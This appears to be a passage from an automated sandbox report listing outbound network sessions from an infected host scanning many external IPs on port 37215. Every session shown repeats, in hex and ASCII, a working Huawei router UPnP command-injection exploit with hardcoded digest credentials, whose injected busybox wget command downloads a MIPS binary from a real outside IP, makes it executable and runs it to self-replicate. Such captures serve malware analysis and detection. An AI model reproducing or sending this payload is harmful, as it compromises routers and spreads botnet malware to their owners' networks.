                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          405192.168.2.2349896197.65.7.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183459997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          406192.168.2.2343342103.218.232.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183603048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          407192.168.2.233607641.243.63.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183670044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          408192.168.2.2349942197.128.0.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183712006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          409192.168.2.2350768157.118.248.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183733940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          410192.168.2.2347110206.203.2.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183744907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          411192.168.2.234825246.109.161.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183756113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          412192.168.2.234994241.28.111.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183816910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          413192.168.2.235973881.156.38.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183820009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          414192.168.2.233511049.142.223.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183820009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
